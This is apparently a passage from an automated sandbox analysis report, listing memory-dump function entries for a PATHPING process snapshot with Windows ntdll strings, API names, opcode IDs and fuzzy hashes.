                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                • Opcode ID: a9a9a039ddc2c9d79b372520390da4383ff7d89ced21ff74684995277e0e10e7
                                                                                                                                • Instruction ID: 83fdf13766a304697672f27ed2162da47bf24b9254063705bf56dba630cb9113
                                                                                                                                • Opcode Fuzzy Hash: a9a9a039ddc2c9d79b372520390da4383ff7d89ced21ff74684995277e0e10e7
                                                                                                                                • Instruction Fuzzy Hash: F95128B2A44166BFDB10DB9C9994A7EF7B8FB08304B508129E895D7B45D735DE00CBE0
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                • Opcode ID: 1349e2f1f341594223ac39fb09509fe89e7230c8490c3e8118da32f6bbfc14d2
                                                                                                                                • Instruction ID: c25068325f61af5842056fe6e766e4e203d04928171ebf7d5189ea7995abc2fd
                                                                                                                                • Opcode Fuzzy Hash: 1349e2f1f341594223ac39fb09509fe89e7230c8490c3e8118da32f6bbfc14d2
                                                                                                                                • Instruction Fuzzy Hash: E15103B5A40685AEDB20EE9CC89497FB7F9EF54304B4084AAE8D6D7741E774DE00CB60
                                                                                                                                Strings
                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 02D44787
                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02D446FC
                                                                                                                                • ExecuteOptions, xrefs: 02D446A0
                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02D44655
                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02D44725
                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02D44742
                                                                                                                                • Execute=1, xrefs: 02D44713
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                • API String ID: 0-484625025
                                                                                                                                • Opcode ID: 9ed2c543754740154c0ae06f07cfdb48b6c2c5938a38777a88af6b3736903e14
                                                                                                                                • Instruction ID: c13388a04bd3cab7bee652bf2979047654b8ba608bcb10479431ad9833694def
                                                                                                                                • Opcode Fuzzy Hash: 9ed2c543754740154c0ae06f07cfdb48b6c2c5938a38777a88af6b3736903e14
                                                                                                                                • Instruction Fuzzy Hash: 4551F8716002597AFF11ABA4DC95FE9B3A9EF44304F5400A9D506AB3E0DB71AE45CEA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                • Instruction ID: 9e52276fb3487eaca37b492e1b1cfdb9717e629ffbfccad0e9fc70ed023fcded
                                                                                                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                • Instruction Fuzzy Hash: EE02F471509341AFD705CF29C4A0E6EBBEAEFC8704F04892DB9958B364DB31E905CB92
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __aulldvrm
                                                                                                                                • String ID: +$-$0$0
                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                • Instruction ID: 16b1e9c0558bcae4f6eadd1c672f64111eff111696cd3178b691bd36008d45f9
                                                                                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                • Instruction Fuzzy Hash: 6081A270E05249AEDF24CF68E8517FEBBB2AF55718F18415BE891ABB90C7349C41CB60
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                • Opcode ID: ff6cb9184160c1d0e94bc2d94c510f0b5c173bd3a85435cfdbcb0bff9b163630
                                                                                                                                • Instruction ID: 69f4095b14af563ab5ca55edcc32c787b27b9e47bc7954c3e52211bedd053ef4
                                                                                                                                • Opcode Fuzzy Hash: ff6cb9184160c1d0e94bc2d94c510f0b5c173bd3a85435cfdbcb0bff9b163630
                                                                                                                                • Instruction Fuzzy Hash: B7215E76A00159ABDB10EE69D944ABEBBF9EF54744F54012AED05E3300E730DE15CBA1
                                                                                                                                Strings
                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02D402BD
                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02D402E7
                                                                                                                                • RTL: Re-Waiting, xrefs: 02D4031E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                • Opcode ID: de816f93182b79995cc476fda12679584d7b051cc1604dc429eaf26675d1df8c
                                                                                                                                • Instruction ID: 69b45bcc4790963dfb67c7824b18f828eca3e052edf484a3f96bc5ce9ffb7a36
                                                                                                                                • Opcode Fuzzy Hash: de816f93182b79995cc476fda12679584d7b051cc1604dc429eaf26675d1df8c
                                                                                                                                • Instruction Fuzzy Hash: 18E1CD306087419FD7A4CF28C884B2AB7E1EF89318F244A5DF6A58B7E0DB74D944CB52
                                                                                                                                Strings
                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02D47B7F
                                                                                                                                • RTL: Resource at %p, xrefs: 02D47B8E
                                                                                                                                • RTL: Re-Waiting, xrefs: 02D47BAC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                • API String ID: 0-871070163
                                                                                                                                • Opcode ID: 6d063029810fd588564d25863b6b53362866aeaf1b1feff9f62da1d282d6dfd0
                                                                                                                                • Instruction ID: 35a821668ebc685d04ab4d79c2dde48e73dfd2ec5258ff8fba035c9562d95f5c
                                                                                                                                • Opcode Fuzzy Hash: 6d063029810fd588564d25863b6b53362866aeaf1b1feff9f62da1d282d6dfd0
                                                                                                                                • Instruction Fuzzy Hash: 6141AF317087029FD724DE258880B6ABBE5EF89714F100A2EE996DB7D0DB71EC45CB91
                                                                                                                                APIs
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02D4728C
                                                                                                                                Strings
                                                                                                                                • RTL: Resource at %p, xrefs: 02D472A3
                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02D47294
                                                                                                                                • RTL: Re-Waiting, xrefs: 02D472C1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                • Opcode ID: 7198916fb5fbe602b541f70c16293059b57e5a55c528c3643f56e24d5ca97d29
                                                                                                                                • Instruction ID: f56f87c836d69719e23e546833fa4572ca812920dd4d4018cf382349618efcef
                                                                                                                                • Opcode Fuzzy Hash: 7198916fb5fbe602b541f70c16293059b57e5a55c528c3643f56e24d5ca97d29
                                                                                                                                • Instruction Fuzzy Hash: 5841EF31704212ABEB20CE25CC81B6AB7A5FF95718F104619FD95EB390DB21EC46CBE1
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                • Opcode ID: 1c322e76b07e2620588858fa9b90e458ffc2b9454fd0c032946ddd5bcf2fee38
                                                                                                                                • Instruction ID: 3d84001798b9722d37fec7cda7917d12f68dafc91005194c1633eefcba63ebd7
                                                                                                                                • Opcode Fuzzy Hash: 1c322e76b07e2620588858fa9b90e458ffc2b9454fd0c032946ddd5bcf2fee38
                                                                                                                                • Instruction Fuzzy Hash: F7317576A002599EDB20DE28DC54BAEB7F9EF44714F94455AEC89E3300EB309E448F60
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __aulldvrm
                                                                                                                                • String ID: +$-
                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                • Instruction ID: 321fa4105357d226b28686db8b8802603d1c575de29bd759a205eaa06dd5172a
                                                                                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                • Instruction Fuzzy Hash: 32917371E4021AAAFB24DE69E8806BFF7A5EF44724F24451AE855E7BE0D730DD40CB60
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002DCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                • Associated: 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_2ca0000_PATHPING.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$@
                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                • Opcode ID: c9df2c0e07a2356f82473d2d7fcc93d905c1e7c7a71bdbfaac9b9274d930ec23
                                                                                                                                • Instruction ID: 9d4d3a2389808097d1db48a0105ea06dd2228e1fb27afe482e612c401f49b423
                                                                                                                                • Opcode Fuzzy Hash: c9df2c0e07a2356f82473d2d7fcc93d905c1e7c7a71bdbfaac9b9274d930ec23
                                                                                                                                • Instruction Fuzzy Hash: B5812B76D002699BDB31CB54CC49BEEB7B8AF48714F1041EAEA09B7250D7709E84CFA0